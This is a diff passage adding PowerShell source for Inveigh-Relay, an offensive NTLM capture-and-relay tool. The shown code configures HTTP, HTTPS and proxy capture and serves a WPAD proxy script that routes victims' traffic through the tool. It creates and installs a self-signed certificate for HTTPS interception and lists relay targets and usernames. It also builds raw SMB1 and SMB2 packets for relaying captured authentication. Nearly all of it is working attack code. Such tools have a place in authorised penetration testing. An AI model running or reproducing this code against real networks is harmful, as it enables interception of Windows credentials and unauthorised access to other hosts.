+ $inveigh.tool = 2
+ $inveigh.output_stream_only = $true
+ $inveigh.console_input = $false
+ $inveigh.newline = ""
+ $LogOutput = "N"
+ $ShowHelp = "N"
+
+ switch ($ConsoleOutput)
+ {
+
+ 'Low'
+ {
+ $ConsoleOutput = "Low"
+ }
+
+ 'Medium'
+ {
+ $ConsoleOutput = "Medium"
+ }
+
+ default
+ {
+ $ConsoleOutput = "Y"
+ }
+
+ }
+
+}
+else
+{
+ $inveigh.tool = 0
+ $inveigh.newline = ""
+}
+
+# Write startup messages
+$inveigh.output_queue.Add("[*] Inveigh Relay $inveigh_version started at $(Get-Date -format s)") > $null
+
+if($firewall_status)
+{
+ $inveigh.output_queue.Add("[!] Windows Firewall = Enabled") > $null
+}
+
+if($HTTP -eq 'Y')
+{
+
+ if($HTTP_port_check)
+ {
+ $HTTP = "N"
+ $inveigh.output_queue.Add("[+] HTTP Capture/Relay Disabled Due To In Use Port $HTTPPort") > $null
+ }
+ else
+ {
+ $inveigh.output_queue.Add("[+] HTTP Capture/Relay = Enabled") > $null
+
+ if($HTTPIP)
+ {
+ $inveigh.output_queue.Add("[+] HTTP IP Address = $HTTPIP") > $null
+ }
+
+ if($HTTPPort -ne 80)
+ {
+ $inveigh.output_queue.Add("[+] HTTP Port = $HTTPPort") > $null
+ }
+ }
+
+}
+else
+{
+ $inveigh.output_queue.Add("[+] HTTP Capture/Relay = Disabled") > $null
+}
+
+if($HTTPS -eq 'Y')
+{
+
+ if($HTTPS_port_check)
+ {
+ $HTTPS = "N"
+ $inveigh.HTTPS = $false
+ $inveigh.output_queue.Add("[-] HTTPS Capture/Relay Disabled Due To In Use Port $HTTPSPort") > $null
+ }
+ else
+ {
+
+ try
+ {
+ $inveigh.certificate_issuer = $HTTPSCertIssuer
+ $inveigh.certificate_CN = $HTTPSCertSubject
+ $inveigh.output_queue.Add("[+] HTTPS Certificate Issuer = " + $inveigh.certificate_issuer) > $null
+ $inveigh.output_queue.Add("[+] HTTPS Certificate CN = " + $inveigh.certificate_CN) > $null
+ $certificate_check = (Get-ChildItem Cert:\LocalMachine\My | Where-Object {$_.Issuer -match $inveigh.certificate_issuer})
+
+ if(!$certificate_check)
+ {
+ # credit to subTee for cert creation code from Interceptor
+ $certificate_distinguished_name = new-object -com "X509Enrollment.CX500DistinguishedName"
+ $certificate_distinguished_name.Encode( "CN=" + $inveigh.certificate_CN, $certificate_distinguished_name.X500NameFlags.X500NameFlags.XCN_CERT_NAME_STR_NONE)
+ $certificate_issuer_distinguished_name = new-object -com "X509Enrollment.CX500DistinguishedName"
+ $certificate_issuer_distinguished_name.Encode("CN=" + $inveigh.certificate_issuer, $certificate_distinguished_name.X500NameFlags.X500NameFlags.XCN_CERT_NAME_STR_NONE)
+ $certificate_key = new-object -com "X509Enrollment.CX509PrivateKey"
+ $certificate_key.ProviderName = "Microsoft Enhanced RSA and AES Cryptographic Provider"
+ $certificate_key.KeySpec = 2
+ $certificate_key.Length = 2048
+ $certificate_key.MachineContext = 1
+ $certificate_key.Create()
+ $certificate_server_auth_OID = new-object -com "X509Enrollment.CObjectId"
+ $certificate_server_auth_OID.InitializeFromValue("1.3.6.1.5.5.7.3.1")
+ $certificate_enhanced_key_usage_OID = new-object -com "X509Enrollment.CObjectIds.1"
+ $certificate_enhanced_key_usage_OID.add($certificate_server_auth_OID)
+ $certificate_enhanced_key_usage_extension = new-object -com "X509Enrollment.CX509ExtensionEnhancedKeyUsage"
+ $certificate_enhanced_key_usage_extension.InitializeEncode($certificate_enhanced_key_usage_OID)
+ $certificate = new-object -com "X509Enrollment.CX509CertificateRequestCertificate"
+ $certificate.InitializeFromPrivateKey(2,$certificate_key,"")
+ $certificate.Subject = $certificate_distinguished_name
+ $certificate.Issuer = $certificate_issuer_distinguished_name
+ $certificate.NotBefore = (get-date).AddDays(-271)
+ $certificate.NotAfter = $certificate.NotBefore.AddDays(824)
+ $certificate_hash_algorithm_OID = New-Object -ComObject X509Enrollment.CObjectId
+ $certificate_hash_algorithm_OID.InitializeFromAlgorithmName(1,0,0,"SHA256")
+ $certificate.HashAlgorithm = $certificate_hash_algorithm_OID
+ $certificate.X509Extensions.Add($certificate_enhanced_key_usage_extension)
+ $certificate_basic_constraints = new-object -com "X509Enrollment.CX509ExtensionBasicConstraints"
+ $certificate_basic_constraints.InitializeEncode("true",1)
+ $certificate.X509Extensions.Add($certificate_basic_constraints)
+ $certificate.Encode()
+ $certificate_enrollment = new-object -com "X509Enrollment.CX509Enrollment"
+ $certificate_enrollment.InitializeFromRequest($certificate)
+ $certificate_data = $certificate_enrollment.CreateRequest(0)
+ $certificate_enrollment.InstallResponse(2,$certificate_data,0,"")
+ $inveigh.certificate = (Get-ChildItem Cert:\LocalMachine\My | Where-Object {$_.Issuer -match $inveigh.certificate_issuer})
+ $inveigh.HTTPS = $true
+ $inveigh.output_queue.Add("[+] HTTPS Capture/Relay = Enabled") > $null
+ }
+ else
+ {
+
+ if($HTTPSForceCertDelete -eq 'Y')
+ {
+ $inveigh.HTTPS_force_certificate_delete = $true
+ }
+
+ $inveigh.HTTPS_existing_certificate = $true
+ $inveigh.output_queue.Add("[+] HTTPS Capture = Using Existing Certificate") > $null
+ }
+
+ }
+ catch
+ {
+ $HTTPS = "N"
+ $inveigh.HTTPS = $false
+ $inveigh.output_queue.Add("[-] HTTPS Capture/Relay Disabled Due To Certificate Error") > $null
+ }
+
+ }
+
+}
+else
+{
+ $inveigh.output_queue.Add("[+] HTTPS Capture/Relay = Disabled") > $null
+}
+
+if($HTTP -eq 'Y' -or $HTTPS -eq 'Y')
+{
+
+ if($Challenge)
+ {
+ $inveigh.output_queue.Add("[+] NTLM Challenge = $Challenge") > $null
+ }
+
+ if($MachineAccounts -eq 'N')
+ {
+ $inveigh.output_queue.Add("[+] Machine Account Capture = Disabled") > $null
+ $inveigh.machine_accounts = $false
+ }
+ else
+ {
+ $inveigh.machine_accounts = $true
+ }
+
+ $inveigh.output_queue.Add("[+] WPAD Authentication = $WPADAuth") > $null
+
+ if($WPADAuth -eq "NTLM")
+ {
+ $WPADAuthIgnore = ($WPADAuthIgnore | Where-Object {$_ -and $_.Trim()})
+
+ if($WPADAuthIgnore.Count -gt 0)
+ {
+ $inveigh.output_queue.Add("[+] WPAD NTLM Authentication Ignore List = " + ($WPADAuthIgnore -join ",")) > $null
+ }
+
+ }
+
+ $HTTPResetDelay = ($HTTPResetDelay | Where-Object {$_ -and $_.Trim()})
+
+ if($HTTPResetDelay.Count -gt 0)
+ {
+ $inveigh.output_queue.Add("[+] HTTP Reset Delay List = " + ($HTTPResetDelay -join ",")) > $null
+ $inveigh.output_queue.Add("[+] HTTP Reset Delay Timeout = $HTTPResetDelayTimeout Seconds") > $null
+ }
+
+}
+
+if($Proxy -eq 'Y')
+{
+
+ if($proxy_port_check)
+ {
+ $HTTP = "N"
+ $inveigh.output_queue.Add("[+] Proxy Capture/Relay Disabled Due To In Use Port $ProxyPort") > $null
+ }
+ else
+ {
+ $inveigh.output_queue.Add("[+] Proxy Capture/Relay = Enabled") > $null
+ $inveigh.output_queue.Add("[+] Proxy Port = $ProxyPort") > $null
+ $ProxyPortFailover = $ProxyPort + 1
+ $WPADResponse = "function FindProxyForURL(url,host){return `"PROXY $proxy_WPAD_IP`:$ProxyPort; PROXY $proxy_WPAD_IP`:$ProxyPortFailover; DIRECT`";}"
+ $ProxyIgnore = ($ProxyIgnore | Where-Object {$_ -and $_.Trim()})
+
+ if($ProxyIgnore.Count -gt 0)
+ {
+ $inveigh.output_queue.Add("[+] Proxy Ignore List = " + ($ProxyIgnore -join ",")) > $null
+ }
+
+ }
+
+}
+
+if($Target.Count -eq 1)
+{
+ $inveigh.output_queue.Add("[+] Relay Target = " + ($Target -join ",")) > $null
+}
+else
+{
+ $inveigh.output_queue.Add("[+] Relay Targets = " + ($Target -join ",")) > $null
+}
+
+if($Username)
+{
+
+ if($Username.Count -eq 1)
+ {
+ $inveigh.output_queue.Add("[+] Relay Username = " + ($Username -join ",")) > $null
+ }
+ else
+ {
+ $inveigh.output_queue.Add("[+] Relay Usernames = " + ($Username -join ",")) > $null
+ }
+
+}
+
+if($RelayAutoDisable -eq 'Y')
+{
+ $inveigh.output_queue.Add("[+] Relay Auto Disable = Enabled") > $null
+}
+else
+{
+ $inveigh.output_queue.Add("[+] Relay Auto Disable = Disabled") > $null
+}
+
+if($RelayAutoExit -eq 'Y')
+{
+ $inveigh.output_queue.Add("[+] Relay Auto Exit = Enabled") > $null
+}
+else
+{
+ $inveigh.output_queue.Add("[+] Relay Auto Exit = Disabled") > $null
+}
+
+if($Service)
+{
+ $inveigh.output_queue.Add("[+] Relay Service = $Service") > $null
+}
+
+if($SMB1)
+{
+ $inveigh.output_queue.Add("[+] SMB Version = SMB1") > $null
+ $SMB_version = 'SMB1'
+}
+
+if($ConsoleOutput -ne 'N')
+{
+
+ if($ConsoleOutput -eq 'Y')
+ {
+ $inveigh.output_queue.Add("[+] Real Time Console Output = Enabled") > $null
+ }
+ else
+ {
+ $inveigh.output_queue.Add("[+] Real Time Console Output = $ConsoleOutput") > $null
+ }
+
+ $inveigh.console_output = $true
+
+ if($ConsoleStatus -eq 1)
+ {
+ $inveigh.output_queue.Add("[+] Console Status = $ConsoleStatus Minute") > $null
+ }
+ elseif($ConsoleStatus -gt 1)
+ {
+ $inveigh.output_queue.Add("[+] Console Status = $ConsoleStatus Minutes") > $null
+ }
+
+}
+else
+{
+
+ if($inveigh.tool -eq 1)
+ {
+ $inveigh.output_queue.Add("[!] Real Time Console Output Disabled Due To External Tool Selection") > $null
+ }
+ else
+ {
+ $inveigh.output_queue.Add("[+] Real Time Console Output = Disabled") > $null
+ }
+
+}
+
+if($ConsoleUnique -eq 'Y')
+{
+ $inveigh.console_unique = $true
+}
+else
+{
+ $inveigh.console_unique = $false
+}
+
+if($FileOutput -eq 'Y')
+{
+ $inveigh.output_queue.Add("[+] Real Time File Output = Enabled") > $null
+ $inveigh.output_queue.Add("[+] Output Directory = $output_directory") > $null
+ $inveigh.file_output = $true
+}
+else
+{
+ $inveigh.output_queue.Add("[+] Real Time File Output = Disabled") > $null
+}
+
+if($FileUnique -eq 'Y')
+{
+ $inveigh.file_unique = $true
+}
+else
+{
+ $inveigh.file_unique = $false
+}
+
+if($LogOutput -eq 'Y')
+{
+ $inveigh.log_output = $true
+}
+else
+{
+ $inveigh.log_output = $false
+}
+
+if($RunTime -eq 1)
+{
+ $inveigh.output_queue.Add("[+] Run Time = $RunTime Minute") > $null
+}
+elseif($RunTime -gt 1)
+{
+ $inveigh.output_queue.Add("[+] Run Time = $RunTime Minutes") > $null
+}
+
+if($ShowHelp -eq 'Y')
+{
+ $inveigh.output_queue.Add("[!] Run Stop-Inveigh to stop Inveigh-Relay") > $null
+
+ if($inveigh.console_output)
+ {
+ $inveigh.output_queue.Add("[*] Press any key to stop real time console output") > $null
+ }
+
+}
+
+while($inveigh.output_queue.Count -gt 0)
+{
+
+ switch -Wildcard ($inveigh.output_queue[0])
+ {
+
+ {$_ -like "?`[`!`]*" -or $_ -like "?`[-`]*"}
+ {
+
+ if($inveigh.status_output -and $inveigh.output_stream_only)
+ {
+ Write-Output($inveigh.output_queue[0] + $inveigh.newline)
+ }
+ elseif($inveigh.status_output)
+ {
+ Write-Warning($inveigh.output_queue[0])
+ }
+
+ if($inveigh.file_output)
+ {
+ $inveigh.log_file_queue.Add($inveigh.output_queue[0]) > $null
+ }
+
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add($inveigh.output_queue[0]) > $null
+ }
+
+ $inveigh.output_queue.RemoveAt(0)
+ }
+
+ default
+ {
+
+ if($inveigh.status_output -and $inveigh.output_stream_only)
+ {
+ Write-Output($inveigh.output_queue[0] + $inveigh.newline)
+ }
+ elseif($inveigh.status_output)
+ {
+ Write-Output($inveigh.output_queue[0])
+ }
+
+ if($inveigh.file_output)
+ {
+ $inveigh.log_file_queue.Add($inveigh.output_queue[0]) > $null
+ }
+
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add($inveigh.output_queue[0]) > $null
+ }
+
+ $inveigh.output_queue.RemoveAt(0)
+ }
+
+ }
+
+}
+
+$process_ID = [System.Diagnostics.Process]::GetCurrentProcess() | Select-Object -expand id
+$process_ID = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($process_ID))
+$process_ID = $process_ID -replace "-00-00",""
+[Byte[]]$inveigh.process_ID_bytes = $process_ID.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+
+# Begin ScriptBlocks
+
+# Shared Basic Functions ScriptBlock
+$shared_basic_functions_scriptblock =
+{
+
+ function DataLength2
+ {
+ param ([Int]$length_start,[Byte[]]$string_extract_data)
+
+ $string_length = [System.BitConverter]::ToUInt16($string_extract_data[$length_start..($length_start + 1)],0)
+ return $string_length
+ }
+
+ function DataLength4
+ {
+ param ([Int]$length_start,[Byte[]]$string_extract_data)
+
+ $string_length = [System.BitConverter]::ToUInt32($string_extract_data[$length_start..($length_start + 3)],0)
+ return $string_length
+ }
+
+ function DataToString
+ {
+ param ([Int]$string_start,[Int]$string_length,[Byte[]]$string_extract_data)
+
+ $string_data = [System.BitConverter]::ToString($string_extract_data[$string_start..($string_start + $string_length - 1)])
+ $string_data = $string_data -replace "-00",""
+ $string_data = $string_data.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+ $string_extract = New-Object System.String ($string_data,0,$string_data.Length)
+ return $string_extract
+ }
+
+}
+
+# Packet Functions ScriptBlock
+$packet_functions_scriptblock =
+{
+ function ConvertFrom-PacketOrderedDictionary
+ {
+ param($packet_ordered_dictionary)
+
+ ForEach($field in $packet_ordered_dictionary.Values)
+ {
+ $byte_array += $field
+ }
+
+ return $byte_array
+ }
+
+ #NetBIOS
+
+ function New-PacketNetBIOSSessionService
+ {
+ param([Int]$packet_header_length,[Int]$packet_data_length)
+
+ [Byte[]]$packet_netbios_session_service_length = [System.BitConverter]::GetBytes($packet_header_length + $packet_data_length)
+ $packet_NetBIOS_session_service_length = $packet_netbios_session_service_length[2..0]
+
+ $packet_NetBIOSSessionService = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_NetBIOSSessionService.Add("Message_Type",[Byte[]](0x00))
+ $packet_NetBIOSSessionService.Add("Length",[Byte[]]($packet_netbios_session_service_length))
+
+ return $packet_NetBIOSSessionService
+ }
+
+ #SMB1
+
+ function New-PacketSMBHeader
+ {
+ param([Byte[]]$packet_command,[Byte[]]$packet_flags,[Byte[]]$packet_flags2,[Byte[]]$packet_tree_ID,[Byte[]]$packet_process_ID,[Byte[]]$packet_user_ID)
+
+ $packet_SMBHeader = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMBHeader.Add("Protocol",[Byte[]](0xff,0x53,0x4d,0x42))
+ $packet_SMBHeader.Add("Command",$packet_command)
+ $packet_SMBHeader.Add("ErrorClass",[Byte[]](0x00))
+ $packet_SMBHeader.Add("Reserved",[Byte[]](0x00))
+ $packet_SMBHeader.Add("ErrorCode",[Byte[]](0x00,0x00))
+ $packet_SMBHeader.Add("Flags",$packet_flags)
+ $packet_SMBHeader.Add("Flags2",$packet_flags2)
+ $packet_SMBHeader.Add("ProcessIDHigh",[Byte[]](0x00,0x00))
+ $packet_SMBHeader.Add("Signature",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ $packet_SMBHeader.Add("Reserved2",[Byte[]](0x00,0x00))
+ $packet_SMBHeader.Add("TreeID",$packet_tree_ID)
+ $packet_SMBHeader.Add("ProcessID",$packet_process_ID)
+ $packet_SMBHeader.Add("UserID",$packet_user_ID)
+ $packet_SMBHeader.Add("MultiplexID",[Byte[]](0x00,0x00))
+
+ return $packet_SMBHeader
+ }
+
+ function New-PacketSMBNegotiateProtocolRequest
+ {
+ param([String]$packet_version)
+
+ if($packet_version -eq 'SMB1')
+ {
+ [Byte[]]$packet_byte_count = 0x0c,0x00
+ }
+ else
+ {
+ [Byte[]]$packet_byte_count = 0x22,0x00
+ }
+
+ $packet_SMBNegotiateProtocolRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMBNegotiateProtocolRequest.Add("WordCount",[Byte[]](0x00))
+ $packet_SMBNegotiateProtocolRequest.Add("ByteCount",$packet_byte_count)
+ $packet_SMBNegotiateProtocolRequest.Add("RequestedDialects_Dialect_BufferFormat",[Byte[]](0x02))
+ $packet_SMBNegotiateProtocolRequest.Add("RequestedDialects_Dialect_Name",[Byte[]](0x4e,0x54,0x20,0x4c,0x4d,0x20,0x30,0x2e,0x31,0x32,0x00))
+
+ if($packet_version -ne 'SMB1')
+ {
+ $packet_SMBNegotiateProtocolRequest.Add("RequestedDialects_Dialect_BufferFormat2",[Byte[]](0x02))
+ $packet_SMBNegotiateProtocolRequest.Add("RequestedDialects_Dialect_Name2",[Byte[]](0x53,0x4d,0x42,0x20,0x32,0x2e,0x30,0x30,0x32,0x00))
+ $packet_SMBNegotiateProtocolRequest.Add("RequestedDialects_Dialect_BufferFormat3",[Byte[]](0x02))
+ $packet_SMBNegotiateProtocolRequest.Add("RequestedDialects_Dialect_Name3",[Byte[]](0x53,0x4d,0x42,0x20,0x32,0x2e,0x3f,0x3f,0x3f,0x00))
+ }
+
+ return $packet_SMBNegotiateProtocolRequest
+ }
+
+ function New-PacketSMBSessionSetupAndXRequest
+ {
+ param([Byte[]]$packet_security_blob)
+
+ [Byte[]]$packet_byte_count = [System.BitConverter]::GetBytes($packet_security_blob.Length)
+ $packet_byte_count = $packet_byte_count[0,1]
+ [Byte[]]$packet_security_blob_length = [System.BitConverter]::GetBytes($packet_security_blob.Length + 5)
+ $packet_security_blob_length = $packet_security_blob_length[0,1]
+
+ $packet_SMBSessionSetupAndXRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMBSessionSetupAndXRequest.Add("WordCount",[Byte[]](0x0c))
+ $packet_SMBSessionSetupAndXRequest.Add("AndXCommand",[Byte[]](0xff))
+ $packet_SMBSessionSetupAndXRequest.Add("Reserved",[Byte[]](0x00))
+ $packet_SMBSessionSetupAndXRequest.Add("AndXOffset",[Byte[]](0x00,0x00))
+ $packet_SMBSessionSetupAndXRequest.Add("MaxBuffer",[Byte[]](0xff,0xff))
+ $packet_SMBSessionSetupAndXRequest.Add("MaxMpxCount",[Byte[]](0x02,0x00))
+ $packet_SMBSessionSetupAndXRequest.Add("VCNumber",[Byte[]](0x01,0x00))
+ $packet_SMBSessionSetupAndXRequest.Add("SessionKey",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMBSessionSetupAndXRequest.Add("SecurityBlobLength",$packet_byte_count)
+ $packet_SMBSessionSetupAndXRequest.Add("Reserved2",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMBSessionSetupAndXRequest.Add("Capabilities",[Byte[]](0x44,0x00,0x00,0x80))
+ $packet_SMBSessionSetupAndXRequest.Add("ByteCount",$packet_security_blob_length)
+ $packet_SMBSessionSetupAndXRequest.Add("SecurityBlob",$packet_security_blob)
+ $packet_SMBSessionSetupAndXRequest.Add("NativeOS",[Byte[]](0x00,0x00,0x00))
+ $packet_SMBSessionSetupAndXRequest.Add("NativeLANManage",[Byte[]](0x00,0x00))
+
+ return $packet_SMBSessionSetupAndXRequest
+ }
+
+ function New-PacketSMBTreeConnectAndXRequest
+ {
+ param([Byte[]]$packet_path)
+
+ [Byte[]]$packet_path_length = [System.BitConverter]::GetBytes($packet_path.Length + 7)
+ $packet_path_length = $packet_path_length[0,1]
+
+ $packet_SMBTreeConnectAndXRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMBTreeConnectAndXRequest.Add("WordCount",[Byte[]](0x04))
+ $packet_SMBTreeConnectAndXRequest.Add("AndXCommand",[Byte[]](0xff))
+ $packet_SMBTreeConnectAndXRequest.Add("Reserved",[Byte[]](0x00))
+ $packet_SMBTreeConnectAndXRequest.Add("AndXOffset",[Byte[]](0x00,0x00))
+ $packet_SMBTreeConnectAndXRequest.Add("Flags",[Byte[]](0x00,0x00))
+ $packet_SMBTreeConnectAndXRequest.Add("PasswordLength",[Byte[]](0x01,0x00))
+ $packet_SMBTreeConnectAndXRequest.Add("ByteCount",$packet_path_length)
+ $packet_SMBTreeConnectAndXRequest.Add("Password",[Byte[]](0x00))
+ $packet_SMBTreeConnectAndXRequest.Add("Tree",$packet_path)
+ $packet_SMBTreeConnectAndXRequest.Add("Service",[Byte[]](0x3f,0x3f,0x3f,0x3f,0x3f,0x00))
+
+ return $packet_SMBTreeConnectAndXRequest
+ }
+
+ function New-PacketSMBNTCreateAndXRequest
+ {
+ param([Byte[]]$packet_named_pipe)
+
+ [Byte[]]$packet_named_pipe_length = [System.BitConverter]::GetBytes($packet_named_pipe.Length)
+ $packet_named_pipe_length = $packet_named_pipe_length[0,1]
+ [Byte[]]$packet_file_name_length = [System.BitConverter]::GetBytes($packet_named_pipe.Length - 1)
+ $packet_file_name_length = $packet_file_name_length[0,1]
+
+ $packet_SMBNTCreateAndXRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMBNTCreateAndXRequest.Add("WordCount",[Byte[]](0x18))
+ $packet_SMBNTCreateAndXRequest.Add("AndXCommand",[Byte[]](0xff))
+ $packet_SMBNTCreateAndXRequest.Add("Reserved",[Byte[]](0x00))
+ $packet_SMBNTCreateAndXRequest.Add("AndXOffset",[Byte[]](0x00,0x00))
+ $packet_SMBNTCreateAndXRequest.Add("Reserved2",[Byte[]](0x00))
+ $packet_SMBNTCreateAndXRequest.Add("FileNameLen",$packet_file_name_length)
+ $packet_SMBNTCreateAndXRequest.Add("CreateFlags",[Byte[]](0x16,0x00,0x00,0x00))
+ $packet_SMBNTCreateAndXRequest.Add("RootFID",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMBNTCreateAndXRequest.Add("AccessMask",[Byte[]](0x00,0x00,0x00,0x02))
+ $packet_SMBNTCreateAndXRequest.Add("AllocationSize",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ $packet_SMBNTCreateAndXRequest.Add("FileAttributes",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMBNTCreateAndXRequest.Add("ShareAccess",[Byte[]](0x07,0x00,0x00,0x00))
+ $packet_SMBNTCreateAndXRequest.Add("Disposition",[Byte[]](0x01,0x00,0x00,0x00))
+ $packet_SMBNTCreateAndXRequest.Add("CreateOptions",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMBNTCreateAndXRequest.Add("Impersonation",[Byte[]](0x02,0x00,0x00,0x00))
+ $packet_SMBNTCreateAndXRequest.Add("SecurityFlags",[Byte[]](0x00))
+ $packet_SMBNTCreateAndXRequest.Add("ByteCount",$packet_named_pipe_length)
+ $packet_SMBNTCreateAndXRequest.Add("Filename",$packet_named_pipe)
+
+ return $packet_SMBNTCreateAndXRequest
+ }
+
+ function New-PacketSMBReadAndXRequest
+ {
+ $packet_SMBReadAndXRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMBReadAndXRequest.Add("WordCount",[Byte[]](0x0a))
+ $packet_SMBReadAndXRequest.Add("AndXCommand",[Byte[]](0xff))
+ $packet_SMBReadAndXRequest.Add("Reserved",[Byte[]](0x00))
+ $packet_SMBReadAndXRequest.Add("AndXOffset",[Byte[]](0x00,0x00))
+ $packet_SMBReadAndXRequest.Add("FID",[Byte[]](0x00,0x40))
+ $packet_SMBReadAndXRequest.Add("Offset",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMBReadAndXRequest.Add("MaxCountLow",[Byte[]](0x58,0x02))
+ $packet_SMBReadAndXRequest.Add("MinCount",[Byte[]](0x58,0x02))
+ $packet_SMBReadAndXRequest.Add("Unknown",[Byte[]](0xff,0xff,0xff,0xff))
+ $packet_SMBReadAndXRequest.Add("Remaining",[Byte[]](0x00,0x00))
+ $packet_SMBReadAndXRequest.Add("ByteCount",[Byte[]](0x00,0x00))
+
+ return $packet_SMBReadAndXRequest
+ }
+
+ function New-PacketSMBWriteAndXRequest
+ {
+ param([Byte[]]$packet_file_ID,[Int]$packet_RPC_length)
+
+ [Byte[]]$packet_write_length = [System.BitConverter]::GetBytes($packet_RPC_length)
+ $packet_write_length = $packet_write_length[0,1]
+
+ $packet_SMBWriteAndXRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMBWriteAndXRequest.Add("WordCount",[Byte[]](0x0e))
+ $packet_SMBWriteAndXRequest.Add("AndXCommand",[Byte[]](0xff))
+ $packet_SMBWriteAndXRequest.Add("Reserved",[Byte[]](0x00))
+ $packet_SMBWriteAndXRequest.Add("AndXOffset",[Byte[]](0x00,0x00))
+ $packet_SMBWriteAndXRequest.Add("FID",$packet_file_ID)
+ $packet_SMBWriteAndXRequest.Add("Offset",[Byte[]](0xea,0x03,0x00,0x00))
+ $packet_SMBWriteAndXRequest.Add("Reserved2",[Byte[]](0xff,0xff,0xff,0xff))
+ $packet_SMBWriteAndXRequest.Add("WriteMode",[Byte[]](0x08,0x00))
+ $packet_SMBWriteAndXRequest.Add("Remaining",$packet_write_length)
+ $packet_SMBWriteAndXRequest.Add("DataLengthHigh",[Byte[]](0x00,0x00))
+ $packet_SMBWriteAndXRequest.Add("DataLengthLow",$packet_write_length)
+ $packet_SMBWriteAndXRequest.Add("DataOffset",[Byte[]](0x3f,0x00))
+ $packet_SMBWriteAndXRequest.Add("HighOffset",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMBWriteAndXRequest.Add("ByteCount",$packet_write_length)
+
+ return $packet_SMBWriteAndXRequest
+ }
+
+ function New-PacketSMBCloseRequest
+ {
+ param ([Byte[]]$packet_file_ID)
+
+ $packet_SMBCloseRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMBCloseRequest.Add("WordCount",[Byte[]](0x03))
+ $packet_SMBCloseRequest.Add("FID",$packet_file_ID)
+ $packet_SMBCloseRequest.Add("LastWrite",[Byte[]](0xff,0xff,0xff,0xff))
+ $packet_SMBCloseRequest.Add("ByteCount",[Byte[]](0x00,0x00))
+
+ return $packet_SMBCloseRequest
+ }
+
+ function New-PacketSMBTreeDisconnectRequest
+ {
+ $packet_SMBTreeDisconnectRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMBTreeDisconnectRequest.Add("WordCount",[Byte[]](0x00))
+ $packet_SMBTreeDisconnectRequest.Add("ByteCount",[Byte[]](0x00,0x00))
+
+ return $packet_SMBTreeDisconnectRequest
+ }
+
+ function New-PacketSMBLogoffAndXRequest
+ {
+ $packet_SMBLogoffAndXRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMBLogoffAndXRequest.Add("WordCount",[Byte[]](0x02))
+ $packet_SMBLogoffAndXRequest.Add("AndXCommand",[Byte[]](0xff))
+ $packet_SMBLogoffAndXRequest.Add("Reserved",[Byte[]](0x00))
+ $packet_SMBLogoffAndXRequest.Add("AndXOffset",[Byte[]](0x00,0x00))
+ $packet_SMBLogoffAndXRequest.Add("ByteCount",[Byte[]](0x00,0x00))
+
+ return $packet_SMBLogoffAndXRequest
+ }
+
+ #SMB2
+
+ function New-PacketSMB2Header
+ {
+ param([Byte[]]$packet_command,[Byte[]]$packet_credit_request,[Int]$packet_message_ID,[Byte[]]$packet_tree_ID,[Byte[]]$packet_session_ID)
+
+ [Byte[]]$packet_message_ID = [System.BitConverter]::GetBytes($packet_message_ID) + 0x00,0x00,0x00,0x00
+
+ $packet_SMB2Header = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMB2Header.Add("ProtocolID",[Byte[]](0xfe,0x53,0x4d,0x42))
+ $packet_SMB2Header.Add("StructureSize",[Byte[]](0x40,0x00))
+ $packet_SMB2Header.Add("CreditCharge",[Byte[]](0x01,0x00))
+ $packet_SMB2Header.Add("ChannelSequence",[Byte[]](0x00,0x00))
+ $packet_SMB2Header.Add("Reserved",[Byte[]](0x00,0x00))
+ $packet_SMB2Header.Add("Command",$packet_command)
+ $packet_SMB2Header.Add("CreditRequest",$packet_credit_request)
+ $packet_SMB2Header.Add("Flags",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2Header.Add("NextCommand",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2Header.Add("MessageID",$packet_message_ID)
+ $packet_SMB2Header.Add("ProcessID",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2Header.Add("TreeID",$packet_tree_ID)
+ $packet_SMB2Header.Add("SessionID",$packet_session_ID)
+ $packet_SMB2Header.Add("Signature",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+
+ return $packet_SMB2Header
+ }
+
+ function New-PacketSMB2NegotiateProtocolRequest
+ {
+ $packet_SMB2NegotiateProtocolRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMB2NegotiateProtocolRequest.Add("StructureSize",[Byte[]](0x24,0x00))
+ $packet_SMB2NegotiateProtocolRequest.Add("DialectCount",[Byte[]](0x02,0x00))
+ $packet_SMB2NegotiateProtocolRequest.Add("SecurityMode",[Byte[]](0x01,0x00))
+ $packet_SMB2NegotiateProtocolRequest.Add("Reserved",[Byte[]](0x00,0x00))
+ $packet_SMB2NegotiateProtocolRequest.Add("Capabilities",[Byte[]](0x40,0x00,0x00,0x00))
+ $packet_SMB2NegotiateProtocolRequest.Add("ClientGUID",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ $packet_SMB2NegotiateProtocolRequest.Add("NegotiateContextOffset",[Byte[]](0x00,0x00,0x00,0x00))
